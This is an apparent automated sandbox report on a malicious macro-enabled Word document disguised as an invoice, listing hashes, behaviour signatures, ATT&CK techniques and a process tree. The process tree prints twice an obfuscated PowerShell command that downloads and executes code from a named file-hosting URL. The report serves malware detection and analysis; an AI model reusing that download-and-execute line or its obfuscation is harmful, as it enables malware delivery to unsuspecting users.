Overview

overview

10

Static

static

8

INVOICE PA...D.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    239s
  • max time network
    243s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    10-06-2022 14:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INVOICE PACKAGE LINK TO DOWNLOAD.docm

  • Size

    16KB

  • MD5

    f2d0c66b801244c059f636d08a474079

  • SHA1

    c62129fff128817b5af62aa0051c082f9992112e

  • SHA256

    08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873

  • SHA512

    5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://filetransfer.io/data-package/UR2whuBv/download

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5112
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.0.1282594299\2012578561" -parentBuildID 20200403170909 -prefsHandle 1684 -prefMapHandle 1600 -prefsLen 1 -prefMapSize 219989 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 1764 gpu
        3⤵
          PID:4776
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.3.1318757906\1276019456" -childID 1 -isForBrowser -prefsHandle 2380 -prefMapHandle 1480 -prefsLen 112 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 2328 tab
          3⤵
            PID:4376
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.13.2093681315\2130023771" -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 6894 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 3712 tab
            3⤵
              PID:2296

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Web Service

        1
        T1102

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          abc27673d9c940ad74b41c58391d2412

          SHA1

          9a31a521a521dcd0f974ce6f7a50aecc69a50df0

          SHA256

          cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

          SHA512

          c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

          Download Submit
        • memory/1504-138-0x000002AA5FBE0000-0x000002AA5FC02000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1504-137-0x0000000000000000-mapping.dmp
          Download
        • memory/1504-140-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1504-139-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2512-136-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-133-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-130-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-135-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-134-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-132-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2512-131-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/5112-141-0x0000000000000000-mapping.dmp
          Download
        • memory/5112-144-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/5112-145-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmp
          Filesize

          10.8MB

          Download